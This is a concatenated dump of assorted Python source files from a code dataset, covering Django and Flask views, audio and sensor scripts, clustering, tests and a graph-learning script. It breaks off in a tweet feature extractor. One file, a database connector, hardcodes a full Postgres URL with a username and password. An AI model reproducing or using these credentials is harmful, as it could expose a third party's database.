# test if pk is correct (hexadecimal)\n except:\n return Response({'message': f'Wrong pk {pk}'}, status.HTTP_400_BAD_REQUEST)\n else:\n # get instance from remote node\n error = None\n instance = None\n try:\n data = getObjectFromLedger(pk, self.ledger_query_call)\n except JsonException as e:\n return Response(e.msg, status=status.HTTP_400_BAD_REQUEST)\n except Http404:\n return Response(f'No element with key {pk}', status=status.HTTP_404_NOT_FOUND)\n else:\n try:\n # try to get it from local db to check if description exists\n instance = self.get_object()\n except Http404:\n try:\n instance = self.create_or_update_algo(data, pk)\n except Exception as e:\n error = e\n else:\n # check if instance has description\n if not instance.description:\n try:\n instance = self.create_or_update_algo(data, pk)\n except Exception as e:\n error = e\n finally:\n if error is not None:\n return Response(str(error), status=status.HTTP_400_BAD_REQUEST)\n\n # do not give access to local files address\n if instance is not None:\n serializer = self.get_serializer(instance, fields=('owner', 'pkhash', 'creation_date', 'last_modified'))\n data.update(serializer.data)\n else:\n data = {'message': 'Fail to get instance'}\n\n return Response(data, status=status.HTTP_200_OK)\n\n def list(self, request, *args, **kwargs):\n # can modify result by interrogating `request.version`\n\n data, st = queryLedger({\n 'args': '{\"Args\":[\"queryAlgos\"]}'\n })\n\n modelData = None\n\n # init list to return\n if data is None:\n data = []\n l = [data]\n\n if st == 200:\n\n # parse filters\n query_params = request.query_params.get('search', None)\n\n if query_params is not None:\n try:\n filters = get_filters(query_params)\n except Exception as exc:\n return Response(\n {'message': f'Malformed search filters {query_params}'},\n status=status.HTTP_400_BAD_REQUEST)\n else:\n # filtering, reinit l to empty array\n l = []\n for idx, filter in enumerate(filters):\n # init each list iteration to data\n l.append(data)\n for k, subfilters in filter.items():\n if k == 'algo': # filter by own key\n for key, val in subfilters.items():\n l[idx] = [x for x in l[idx] if x[key] in val]\n elif k == 'model': # select objectives used by outModel hash\n if not modelData:\n # TODO find a way to put this call in cache\n modelData, st = queryLedger({\n 'args': '{\"Args\":[\"queryTraintuples\"]}'\n })\n if st != status.HTTP_200_OK:\n return Response(modelData, status=st)\n if modelData is None:\n modelData = []\n\n for key, val in subfilters.items():\n filteredData = [x for x in modelData if x['outModel'] is not None and x['outModel'][key] in val]\n algoKeys = [x['algo']['hash'] for x in filteredData]\n l[idx] = [x for x in l[idx] if x['key'] in algoKeys]\n\n return Response(l, status=st)\n\n @action(detail=True)\n def file(self, request, *args, **kwargs):\n return self.manage_file('file')\n\n @action(detail=True)\n def description(self, request, *args, **kwargs):\n return self.manage_file('description')\n","sub_path":"substrabac/substrapp/views/algo.py","file_name":"algo.py","file_ext":"py","file_size_in_byte":9282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"202650199","text":"import math\n\nimport const\nimport event\n\n\nclass RingModulator(object):\n\n def __init__(self, carrier, modulator, sidebands, ideal=True, diff=True):\n\n #: Note. Usually higher in pitch than *modulator*.\n self.carrier = carrier\n\n #: Note. Usually lower in pitch than *carrier*.\n self.modulator = modulator\n\n #: Integer. The number of sidebands to output.\n self.sidebands = sidebands\n\n #: Boolean. If False, output will include *carrier* and *modulator*.\n #: Default is True.\n self.ideal = ideal\n\n #: Boolean. If False, output will exclude difference tones. Default is\n #: True.\n self.diff = diff\n\n def __repr__(self):\n return \"%s %s %s %s %s\" % (self.carrier,\n self.modulator,\n self.sidebands,\n self.ideal,\n self.diff)\n\n # modulate\n # ------------------------------------------------------------------- #\n\n def modulate(self):\n \"\"\"\n Create a spectrum via ring modulation.\n\n :returns: Chord\n\n \"\"\"\n note_list = []\n i = 1\n # include carrier and modulator?\n if self.ideal is False:\n note_list.append(self.carrier)\n note_list.append(self.modulator)\n while i < self.sidebands + 1:\n carrier_freq = self.carrier.frequency()\n modulator_freq = self.modulator.frequency()\n # create upper sidebands\n freq = carrier_freq + (i * modulator_freq)\n n = event.Note(self._frequency_to_midi(freq),\n self.carrier.duration,\n self.carrier.intensity)\n note_list.append(n)\n # create lower sidebands\n if self.diff is True:\n freq = self._frequency_to_midi(carrier_freq -\n (i * modulator_freq))\n n = event.Note(self._frequency_to_midi(freq),\n self.carrier.duration,\n self.carrier.intensity)\n note_list.append(n)\n i += 1\n return event.Chord(note_list,\n self.carrier.duration,\n self.carrier.intensity)\n\n # convert\n # ------------------------------------------------------------------- #\n\n @staticmethod\n def _frequency_to_midi(frequency):\n \"\"\"\n Convert frequency to MIDI note number.\n\n :param frequency: frequency in hertz (Hz)\n :type frequency: float\n :returns: int -- MIDI note number\n\n \"\"\"\n frequency /= const.A4_HZ\n frequency = abs(frequency)\n midi = (math.log(frequency, 2) * const.PITCH_CLASS_COUNT) + \\\n const.A4_MIDI\n return int(round(midi))\n","sub_path":"casc/ring_modulator.py","file_name":"ring_modulator.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"95283558","text":"\n\nfrom xai.brain.wordbase.nouns._width import _WIDTH\n\n#calss header\nclass _WIDTHS(_WIDTH, ):\n\tdef __init__(self,): \n\t\t_WIDTH.__init__(self)\n\t\tself.name = \"WIDTHS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"width\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_widths.py","file_name":"_widths.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144597206","text":"import sys\nimport k_means\nsys.path.append(\"..\")\n\nimport clusters as utils\n\ndistance_function = utils.pearson\nnum_clusters = 7\n\n\ndef kcluster_bisect(clusters, vectors, distance=utils.euclidean, k=4):\n if len(clusters) == k:\n return clusters\n\n max_sse = None\n cluster_index = None\n for i in range(len(clusters)): # Compute cluster with highest SSE\n cluster = clusters[i]\n score = 0\n\n centroid = k_means.get_centroid(cluster, vectors)\n\n for country in cluster:\n score += pow(distance(vectors[country], centroid), 2)\n\n if max_sse is None or score > max_sse:\n max_sse = score\n cluster_index = i\n\n original_indexes = [] # Save actual indexes of the chosen cluster relative to the original vectors\n for index in clusters[cluster_index]:\n original_indexes.append(index)\n\n new_clusters = utils.kcluster([vectors[index] for index in clusters.pop(cluster_index)], distance=distance, k=2)\n for cluster in new_clusters:\n for i in range(len(cluster)):\n cluster[i] = original_indexes[cluster[i]] # Convert back to original vector indexes\n\n return kcluster_bisect(clusters + new_clusters, vectors, distance=distance, k=k)\n\n\ndef main(input_f):\n (countries, vectors) = k_means.read_file(input_f)\n\n clusters = kcluster_bisect([list(range(len(vectors)))], vectors, distance=distance_function, k=num_clusters)\n proper_clusters = [] # Nonempty clusters\n for i in range(num_clusters):\n if len(clusters[i]) == 0:\n continue\n\n proper_clusters.append(clusters[i])\n print('cluster {}:'.format(i + 1))\n print([countries[r] for r in clusters[i]])\n\n print(\"SSE: \" + str(k_means.sse(proper_clusters, vectors)))\n\n\nif __name__ == \"__main__\":\n main(\"data/preprocessed.csv\")","sub_path":"lab/k_means_bisect.py","file_name":"k_means_bisect.py","file_ext":"py","file_size_in_byte":1826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"611809803","text":"from datetime import date, datetime\n\nimport six\nfrom mock import patch\n\nfrom bravado_core.formatter import to_python\n\n\ndef test_none():\n spec = {'type': 'string', 'format': 'date'}\n assert to_python(spec, None) is None\n\n\ndef test_no_format_returns_value():\n spec = {'type': 'string'}\n assert 'boo' == to_python(spec, 'boo')\n\n\ndef test_date():\n spec = {'type': 'string', 'format': 'date'}\n assert date(2015, 4, 1) == to_python(spec, '2015-04-01')\n\n\ndef test_datetime():\n spec = {'type': 'string', 'format': 'date-time'}\n result = to_python(spec, '2015-03-22T13:19:54')\n assert datetime(2015, 3, 22, 13, 19, 54) == result\n\n\n@patch('bravado_core.formatter.warnings.warn')\ndef test_no_registered_format_returns_value_as_is(_):\n spec = {'type': 'foo', 'format': 'bar'}\n assert 'baz' == to_python(spec, 'baz')\n\n\n@patch('bravado_core.formatter.warnings.warn')\ndef test_no_registered_format_throws_warning(mock_warn):\n to_python({'type': 'foo', 'format': 'bar'}, 'baz')\n mock_warn.assert_called_once()\n\n\ndef test_int64_long():\n spec = {'type': 'integer', 'format': 'int64'}\n if six.PY3:\n result = to_python(spec, 999)\n assert 999 == result\n else:\n result = to_python(spec, long(999))\n assert long(999) == result\n\n\ndef test_int64_int():\n spec = {'type': 'integer', 'format': 'int64'}\n result = to_python(spec, 999)\n if six.PY3:\n assert 999 == result\n assert isinstance(result, int)\n else:\n assert long(999) == result\n assert isinstance(result, long)\n\n\ndef test_int32_long():\n if six.PY3: # test irrelevant in py3\n return\n spec = {'type': 'integer', 'format': 'int32'}\n result = to_python(spec, long(999))\n assert 999 == result\n assert isinstance(result, int)\n\n\ndef test_int32_int():\n spec = {'type': 'integer', 'format': 'int32'}\n result = to_python(spec, 999)\n assert 999 == result\n assert isinstance(result, int)\n\n\ndef test_float():\n spec = {'type': 'number', 'format': 'float'}\n result = to_python(spec, float(3.14))\n assert 3.14 == result\n assert isinstance(result, float)\n\n\ndef test_double():\n spec = {'type': 'number', 'format': 'double'}\n result = to_python(spec, float(3.14))\n assert 3.14 == result\n assert isinstance(result, float)\n\n\ndef test_byte():\n spec = {'type': 'string', 'format': 'byte'}\n result = to_python(spec, 'x')\n assert 'x' == result\n assert isinstance(result, str)\n","sub_path":"tests/formatter/to_python_test.py","file_name":"to_python_test.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"92545283","text":"import datetime\nimport json\n\nfrom flask import request\nfrom flask_restplus import Resource\n\nfrom app.main.dto.snapshot_dto import SnapshotDTO\nfrom app.main.service import snapshot_service as service\nfrom app.main.service.snapshot_service import SnapshotServiceResponse\n\napi = SnapshotDTO.api\n\n\n@api.route('')\nclass SnapshotsResource(Resource):\n ISO_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'\n EXPECTED_PROPERTIES = {'posts', 'keywords'}\n MIN_CLASSES_REQUIRED = 2\n\n @api.response(SnapshotServiceResponse.AlreadyExists, 'Snapshot already exists.')\n @api.response(SnapshotServiceResponse.Created, 'Snapshot created successfully.')\n @api.doc('Register a snapshot')\n @api.expect(SnapshotDTO.snapshot, validate=True)\n def post(self):\n spans_from = datetime.datetime.strptime(request.json['from'], self.ISO_FORMAT)\n spans_to = datetime.datetime.strptime(request.json['to'], self.ISO_FORMAT)\n synonym = request.json['synonym']\n statistics = json.loads(request.json['statistics'])\n sentiment = request.json['sentiment']\n\n # Confirm that all required classes are provided\n if len(statistics) < self.MIN_CLASSES_REQUIRED:\n return dict(message='Invalid amount of classes specified.'), 400\n\n # Confirm that statistics for all classes are provided\n for stat_class in statistics:\n for expected in self.EXPECTED_PROPERTIES:\n if expected not in statistics[stat_class]:\n return dict(message=f'Expected property {expected} in class {stat_class}.'), 400\n\n return service.add_snapshot(sentiment, statistics, spans_from, spans_to, synonym)\n","sub_path":"app/main/controller/snapshot_controller.py","file_name":"snapshot_controller.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"319994170","text":"import argparse\nimport re\nimport time\nimport urllib.parse\nfrom pathlib import Path\nfrom typing import Optional, Union, cast\n\nfrom bs4 import BeautifulSoup, Doctype, Tag\n\n\ndef get_html_listing_soup(\n in_folder: Union[Path, str],\n page_title: Optional[str] = None,\n out_file: Optional[Union[Path, str]] = None,\n) -> BeautifulSoup:\n\n in_folder = Path(in_folder)\n\n soup = BeautifulSoup(\"\", \"html5lib\")\n cast(Tag, soup.find(\"html\"))[\"lang\"] = \"en\"\n\n soup.insert(0, Doctype(\"html\"))\n\n if page_title is None:\n page_title = in_folder.stem\n\n head = cast(Tag, soup.find(\"head\"))\n title = soup.new_tag(\"title\")\n title.string = page_title\n head.append(title)\n\n body = cast(Tag, soup.find(\"body\"))\n\n link: Tag = soup.new_tag(\"div\")\n body.append(link)\n link_a: Tag = soup.new_tag(\"a\")\n link.append(link_a)\n link_a[\n \"href\"\n ] = \"https://dts333.github.io/WSF-Demos/QM%20Course%20Materials/Problems+exercises/qm_problems.html\"\n link_a.string = \"Link to Problems and Exercises Page\"\n\n ul: Tag = soup.new_tag(\"ul\")\n body.append(ul)\n\n now_sec = int(time.time())\n inlined_suffix_regex = re.compile(r\"_inlined$\")\n\n li: Tag\n for demo_full_path in sorted(in_folder.glob(\"**/*.html\")):\n if demo_full_path.is_dir() or demo_full_path.name == \"index.html\":\n continue\n\n li = soup.new_tag(\"li\")\n ul.append(li)\n\n demo_relative_path = urllib.parse.quote(\n str(demo_full_path.relative_to(in_folder)), safe=\"/\"\n )\n a = soup.new_tag(\n \"a\",\n href=(f\"./{demo_relative_path}?t={now_sec}\"),\n )\n\n demo_name = inlined_suffix_regex.sub(\"\", demo_full_path.stem)\n a.string = demo_name\n li.append(a)\n\n if out_file is None:\n out_file = in_folder / \"index.html\"\n\n _ = Path(out_file).write_text(str(soup))\n\n return soup\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"folder\")\n parser.add_argument(\"--title\")\n parser.add_argument(\"--out-file\")\n\n args = parser.parse_args()\n get_html_listing_soup(args.folder, args.title, args.out_file)\n","sub_path":"RB/src/create_demo_listing_html.py","file_name":"create_demo_listing_html.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"156151090","text":"class Solution:\n def plusOne(self, digits: List[int]) -> List[int]:\n r = 1\n for i in range(-1, -len(digits)-1, -1):\n if digits[i]+r >= 10:\n r = 1\n digits[i] = 0\n else:\n r = 0\n digits[i] = digits[i]+1\n break\n if r>0:\n digits.insert(0,r)\n return digits","sub_path":"python3/Week 1/plus-one.py","file_name":"plus-one.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"388498333","text":"#!/usr/bin/env python\nimport rospy\n#import csv\n#import numpy as np\nfrom robotiq_ft_sensor.msg import ft_sensor\nimport numpy as np\nimport time\nimport matplotlib.pyplot as plt\nimport datetime\n#import idealab_tools.data_exchange.csv as csv\n#from std_msgs.msg import Int32\n#from sensor_msgs.msg import Image\n\nFx = 0\nFy = 0\nFz = 0\nMx = 0\nMy = 0\nMz = 0\n\ndef callback(msg):\n global Fx,Fy,Fz,Mx,My,Mz\n Fx = msg.Fx\n Fy = msg.Fy\n Fz = msg.Fz\n Mx = msg.Mx\n My = msg.My\n Mz = msg.Mz\n\n\nrospy.init_node('listener')\nft_data = np.zeros((500,6))\n\nfor index in range(0,499):\n rospy.Subscriber(\"robotiq_ft_sensor\",ft_sensor,callback)\n ft_data[index,0] = Fx\n ft_data[index,1] = Fy\n ft_data[index,2] = Fz\n ft_data[index,3] = Mx\n ft_data[index,4] = My\n ft_data[index,5] = Mz\n time.sleep(0.05)\n print(ft_data[index,:])\n# print(index)\n \n#rospy.spin()\ntst = datetime.datetime.now().isoformat(\"-\").split(\".\")[0].replace(\":\",\"-\")\nfilename = \"ft_data_\"\nfilename = filename + tst\nfig, axs = plt.subplots(2, 1, constrained_layout=True)\naxs[0].set_title('Force')\naxs[1].set_title('Torque')\naxs[0].plot(ft_data[:,0:3])\naxs[0].legend(['Fx','Fy','Fz'])\naxs[1].plot(ft_data[:,3:6])\naxs[1].legend(['Mx','My','Mz'])\nplt.show(block=True)\nnp.savetxt(filename, np.c_[ft_data], delimiter = \",\")\nprint(\"finish collecting\")\n","sub_path":"scripts/ft_sensor_data.py","file_name":"ft_sensor_data.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"123928096","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jun 28 18:23:21 2020\r\n\r\n@author: vishal\r\n\"\"\"\r\n\r\n\r\nn=\"hello world\"\r\ncount=0\r\nfor i in n:\r\n if(i=='o'):\r\n count=count+1\r\n \r\nprint(count)","sub_path":"Module3_A3_Countletter'O'.py","file_name":"Module3_A3_Countletter'O'.py","file_ext":"py","file_size_in_byte":196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"69516899","text":"import pyaudio\nimport numpy as np\n#import matplotlib.pyplot as pyplot\n\nimport peakdetect\nimport customfirwin_ as fir\nimport savgol_filter as sgf\n\n\n# Sound stream params\nCHUNK = 512 #1024 samples per buffer\nFORMAT = pyaudio.paInt16 # bytes per sample\nCHANNELS = 1 # number of channels for micro\nRATE = 8000 #1024 * 8 # Sampling frequency; 44100 Hz is default\n\npa = pyaudio.PyAudio()\n\nstream = pa.open(\n format=FORMAT,\n channels=CHANNELS,\n rate=RATE,\n input=True,\n output=False,\n frames_per_buffer=CHUNK#,\n #input_device_index=2\n)\n\nnyq = RATE//2\nts = 1/RATE # Ts is period\nM = 256 # number of taps in filter\nfc = 0.4756 # from 100 to 4096 bandpass\n\nham_lp = fir.build_filter(M, fc, window=fir.hamming)\nblack_lp = fir.build_filter(M, fc, window=fir.blackman)\nshift = (np.cos(2 * np.pi * 0.5 * np.arange(M + 1)))\nham_hp = ham_lp * shift\nblack_hp = black_lp * shift\n\n'''\n# Create matplotlib figure and axes\nfig, (ax, ax2) = pyplot.subplots(2, figsize=(15, 7))\n# variables for plotting\nx = np.arange(0, 2 * CHUNK, 2)\nx_fft = np.linspace(0, nyq, CHUNK)\n# create a line objects\nline, = ax.plot(x, np.random.rand(CHUNK), '-', lw=2) # **kwargs: '-' is solid line; lw is line width\nline_fft, = ax2.semilogx(x_fft, np.random.rand(CHUNK), '-', lw = 2)\n# basic formatting for the axes\nax.set_title('AUDIO WAVEFORM')\nax.set_xlabel('samples')\nax.set_ylabel('volume')\nax.set_ylim(-1.2, 1.2)\nax.set_xlim(0, 2 * CHUNK)\npyplot.setp(ax, xticks=[0, CHUNK, 2 * CHUNK],yticks=[-1,0,1]) # set properties\npyplot.setp(ax.set_yticklabels((\"-A\",\"\",\"A\")))\nax2.set_xlim(20, nyq)\n# show the plot\npyplot.show(block=False)\n'''\n\nwhile True:\n\n # Get binary data\n data = stream.read(CHUNK)\n data_int = np.frombuffer(data, dtype=np.int16) # Convert data from buffer to int\n data_np = [(i/(2**14)) for i in data_int] # 16 bits = 2^16; first bit for sign; 2^15/2: from -(2^14) to 2^14\n #data_np = lfilter(taps, 1.0, data_np) # filter is used\n #filter the signals\n f_ham = np.convolve(data_np, ham_hp)\n f_black = np.convolve(data_np, black_hp)\n\n #line.set_ydata(data_np)\n\n # FFT\n y_fft = np.fft.fft(data_np)\n y_fft_ = np.fft.fft(fir.hamming(len(f_black))[:-1]*(f_black))\n #print(len(y_fft_))\n gain_coeff = 1.55 # Gain for freqs values 1.5\n spec_data = np.abs(y_fft_[0:CHUNK] / CHUNK * 2)\n\n spec_data = sgf.savgolfilt(spec_data, 3, 5, 1)\n\n #spec_data_ = [0]*int(nyq)\n #for i in range(len(spec_data)):\n # spec_data_[int(i*nyq/CHUNK)] = spec_data[i]\n\n #print(np.amax(spec_data))\n\n # Freq curve smoothing\n #spec_data_smooth = savgol_filter(spec_data, 5, 2)\n # Peak detecting\n maxs, mins = peakdetect.peakdet(spec_data, 0.06)\n\n # Convert taps number in frequencies\n if (len(maxs) > 0):\n for i in range(len(maxs)):\n maxs[i][0] *= RATE/CHUNK*0.8\n #maxs[0:len(maxs)][0] *= RATE/CHUNK\n maxs = maxs[:len(maxs) // 2] # Get first part of vector\n\n print(list(maxs))\n #print(len(spec_data)*RATE/CHUNK)\n\n #line_fft.set_ydata(spec_data)\n\n #fig.canvas.draw()\n #fig.canvas.flush_events()\n\n #print(len(data_int))\n #print(list(data_int))\n","sub_path":"Microphone/Code/Python/sound_4.py","file_name":"sound_4.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"648987009","text":"#!/usr/bin/env python\n\nimport sys\nimport math\nimport ROOT\nfrom array import array\n\nROOT.gROOT.SetStyle(\"Plain\")\nROOT.gStyle.SetOptStat(0)\nROOT.gStyle.SetOptFit()\nROOT.gStyle.SetCanvasColor(0)\nROOT.gStyle.SetTitleFillColor(0)\nROOT.gStyle.SetTitleBorderSize(0)\nROOT.gStyle.SetFrameBorderMode(0)\nROOT.gStyle.SetMarkerStyle(20)\nROOT.gStyle.SetTitleX(0.5)\nROOT.gStyle.SetTitleAlign(23)\nROOT.gStyle.SetLineWidth(3)\nROOT.gStyle.SetLineColor(1)\nROOT.gStyle.SetTitleSize(0.03,\"t\")\n\ndef filldiff(up,down,mid):\n n = up.GetN()\n diffgraph = ROOT.TGraph(2*n)\n i = 0\n xup = ROOT.Double(-9.9)\n yup = ROOT.Double(-9.9)\n xlo = ROOT.Double(-9.9)\n ylo = ROOT.Double(-9.9)\n xmid = ROOT.Double(-9.9)\n ymid = ROOT.Double(-9.9)\n\n while i= 0:\n device = torch.device('cuda:%d' % args.gpu)\n else:\n device = torch.device('cpu')\n\n user_table_path = 's3://xhs.alpha/reddm/' + args.user_table + '/dtm=%s' % args.dsnodash\n user_features = pq.ParquetDataset(user_table_path, filesystem=s3).read().to_pandas()\n\n device_table_path = 's3://xhs.alpha/reddm/' + args.device_table + '/dtm=%s' % args.dsnodash\n device_features = pq.ParquetDataset(device_table_path, filesystem=s3).read().to_pandas()\n\n relation_table_path = 's3://xhs.alpha/reddm/' + args.relation_table + '/dtm=%s' % args.dsnodash\n relation_df = pq.ParquetDataset(relation_table_path, filesystem=s3).read().to_pandas()\n\n label_table_path = 's3://xhs.alpha/reddm/' + args.label_table + '/dtm=%s' % args.dsnodash\n labels = pq.ParquetDataset(label_table_path, filesystem=s3).read().to_pandas()\n\n # Build graph\n graph_builder = PandasGraphBuilder()\n graph_builder.add_entities(user_features, 'user_entity_id', 'user')\n graph_builder.add_entities(device_features, 'device_entity_id', 'device')\n graph_builder.add_binary_relations(relation_df, 'user_entity_id', 'device_entity_id', 'used')\n graph_builder.add_binary_relations(relation_df, 'device_entity_id', 'user_entity_id', 'used-by')\n\n g = graph_builder.build()\n # Create csr/coo/csc formats before launching sampling processes\n # This avoids creating certain formats in each data loader process, which saves momory and CPU.\n g.create_formats_()\n\n # construct subgraph for labeled computation probably save some memory of storing features\n # g = construct_computation_graph(g, n_layers, labels[label_entity_col_name].values, label_entity_type)\n\n # Assign features.\n user_features = user_features.sort_values(by='user_entity_id').values[:, 1:]\n device_features = device_features.sort_values(by='device_entity_id').values[:, 1:]\n labels = labels.values\n val_num, test_num = labels.shape[0] // 8, labels.shape[0] // 8\n n_classes = labels[:, 1].max() + 1\n num_user_feature = user_features.shape[1]\n num_device_feature = device_features.shape[1]\n\n # if args.use_label_subgraph:\n # idxs = np.arange(labels.shape[0])\n # np.random.shuffle(idxs)\n # train_idx, val_idx, test_idx = idxs[val_num + test_num:], idxs[:val_num], idxs[val_num:val_num + test_num]\n # g = dgl.node_subgraph(g, {args.label_entity: labels[:, 0], })\n # user_features = user_features[labels[:, 0]]\n # device_features = device_features[g.nodes['device'].data[dgl.NID]]\n # labels = torch.tensor(labels[:, 1], dtype=torch.int64, device=device)\n # else:\n np.random.shuffle(labels)\n train_idx, val_idx, test_idx = \\\n labels[val_num + test_num:, 0], labels[:val_num, 0], labels[val_num:val_num + test_num, 0]\n expand_labels = np.empty(user_features.shape[0], dtype=np.int64)\n expand_labels[labels[:, 0]] = labels[:, 1]\n labels = torch.tensor(expand_labels, device=device)\n #\n # user_features = F.pad(torch.tensor(user_features, device=device, dtype=torch.float32), (0, num_device_feature))\n # device_features = F.pad(torch.tensor(device_features, device=device, dtype=torch.float32), (num_user_feature, 0))\n user_features = torch.tensor(user_features, device=device, dtype=torch.float32)\n device_features = torch.tensor(device_features, device=device, dtype=torch.float32)\n\n entity_features = {'user': user_features, 'device': device_features}\n\n # g.edges['used'].data['weight'] = torch.ShortTensor(relation_df['relation_edge_weight'].values)\n # g.edges['used-by'].data['weight'] = torch.ShortTensor(relation_df['relation_edge_weight'].values)\n # del relation_df\n # gc.collect()\n\n # prepare for training\n\n data = train_idx, val_idx, test_idx, num_user_feature + num_device_feature, num_user_feature, num_device_feature, \\\n labels, n_classes, entity_features, g\n\n # Run 10 times\n test_accs = []\n for i in range(10):\n test_accs.append(train(args, device, data))\n print('Average test accuracy:', np.mean(test_accs), '±', np.std(test_accs))\n","sub_path":"node_classify.py","file_name":"node_classify.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"299467071","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 22 23:11:08 2018\n\n@author: ASUS\n\"\"\"\n\nimport os\nfrom urllib import parse\nimport psycopg2 as ps\nfrom psycopg2.extras import execute_batch\nfrom datetime import datetime\nimport pandas as pd\n\nqueryLst=0\n\ndef connectToDatabase():\n url='postgres://bmmoobheozofxs:ac8ba0f76a53e13844126695d8bad3d6826d1e087773b87bef85cebc43664f30@ec2-54-225-196-122.compute-1.amazonaws.com:5432/d20apms1nhd8do'\n\n os.environ['DATABASE_URL'] = url\n \n parse.uses_netloc.append('postgres')\n url=parse.urlparse(os.environ['DATABASE_URL'])\n \n conn=ps.connect(\n database=url.path[1:],\n user=url.username,\n password=url.password,\n host=url.hostname,\n port=url.port\n )\n \n cur=conn.cursor()\n \n return cur, conn\n\ndef runquery(query, lst=True, connected=False, valList=(), connList={}):\n if connected:\n cur=connList['cur']\n conn=connList['conn']\n else:\n cur, conn=connectToDatabase()\n \n result=None\n try:\n if len(valList)==0:\n cur.execute(query)\n else:\n print(\"batch\")\n execute_batch(cur, query, valList)\n \n if lst:\n result=list(cur)\n else:\n result=['success']\n except ps.Error as e:\n result=['error']\n print(e)\n except ValueError as e:\n result=['error']\n print(e)\n except:\n result=['error']\n# print(ps.Error)\n \n print(result)\n \n if connected==False:\n cur.close()\n conn.commit()\n \n return result\n\ndef updateCompanyRows(lst, connList): \n lst.sort()\n \n #get current company names and new names to add\n query=\"SELECT name from PRICE\"\n names = [i[0] for i in runquery(query, connected=True, connList=connList)]\n names.sort()\n \n addList=[]\n \n for i in lst:\n try:\n names.remove(i)\n except:\n addList.append(i)\n \n print(addList)\n \n #get all column names\n query=\"SELECT column_name FROM information_schema.columns WHERE table_name = 'price'\"\n colNames=[i[0] for i in runquery(query, connected=True, connList=connList)]\n \n valList=\"\"\n count=0\n for i in addList:\n if count == 0:\n valList=\"('%s'%s %s)\"%(i, ((len(colNames)>1)* \", \"), str([0]*(len(colNames)-1))[1:-1])\n else:\n valList= valList +\", ('%s'%s %s)\"%(i, ((len(colNames)>1)* \", \"), str([0]*(len(colNames)-1))[1:-1])\n count += 1\n print(valList)\n \n print(valList)\n \n #create new row\n if len(addList)>0:\n query=\"INSERT INTO price(%s) VALUES %s\" % (str(colNames)[1:-1].replace(\"'\",\"\"), valList)\n print(query)\n result=runquery(query,lst=False, connected=True, connList=connList)\n else:\n result=[\"table already up to date.\"]\n \n return result\n\ndef createNewRow(connList):\n curDate=datetime.now()\n colName=\"date%s%s%s\"%(format(curDate.day, '02d'), format(curDate.month, '02d'), curDate.year)\n query=\"ALTER TABLE price ADD %s float\"%(colName)\n \n print(query)\n \n result=runquery(query, lst=False, connected=True, connList=connList)\n return result, colName\n\ndef updatePrice(df, connList, colName):\n global queryLst\n queryLst=()\n query=\"UPDATE price SET %s\"%(colName)+\"\"\" = %s WHERE name = %s\"\"\"\n# query=\"UPDATE price SET date9122018 = 110.0 WHERE name = 'test'\"\n print(query)\n try:\n for i in range(len(df.index)):\n queryLst+=((float(df.iloc[i,1]), df.iloc[i,0]),)\n except:\n print(df.iloc[i,0])\n print(i)\n# print(queryLst)\n result=runquery(query, lst=False, connected=True, valList=queryLst, connList=connList)\n# result=runquery(query, lst=False, connected=True, connList=connList)\n \n return result\n\ndef updateDB(df):\n cur, conn=connectToDatabase()\n conn.autocommit=True\n connList={\n 'cur': cur,\n 'conn': conn\n }\n try:\n comNames=list(df['name'])\n result=updateCompanyRows(comNames, connList)\n if result[0] =='error':\n return False, 'error updating / checking companies in DB'\n else:\n result, colName=createNewRow(connList)\n result2=updatePrice(df, connList, colName) \n except ValueError as e:\n print(e)\n cur.close()\n conn.commit() \n except:\n cur.close()\n conn.commit()\n \n cur.close()\n conn.commit()\n\n#df=pd.DataFrame(columns=['name', 'price'])\n#df.loc[0]=['def2', '110.0']\n#df.loc[1]=['test', '112.0']\n#updateDB(df)","sub_path":"dbConnector.py","file_name":"dbConnector.py","file_ext":"py","file_size_in_byte":4640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"228256459","text":"import tweepy\nimport csv\nimport json\nimport pandas as pd\nimport datetime\nimport os\nfrom datetime import date\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\nfrom nltk import tokenize\nfrom nltk.corpus import state_union\nfrom nltk.tokenize import sent_tokenize, word_tokenize, PunktSentenceTokenizer\nfrom SvmClassification import SvmClassification\n\n\n\nclass ExtractFeature:\n \n \n \n def findPoS(self,tweetText):\n train_text = state_union.raw(\"2005-GWBush.txt\")\n custom_sent_tokenizer = PunktSentenceTokenizer(train_text)\n tokenized = custom_sent_tokenizer.tokenize(tweetText)\n posDict = 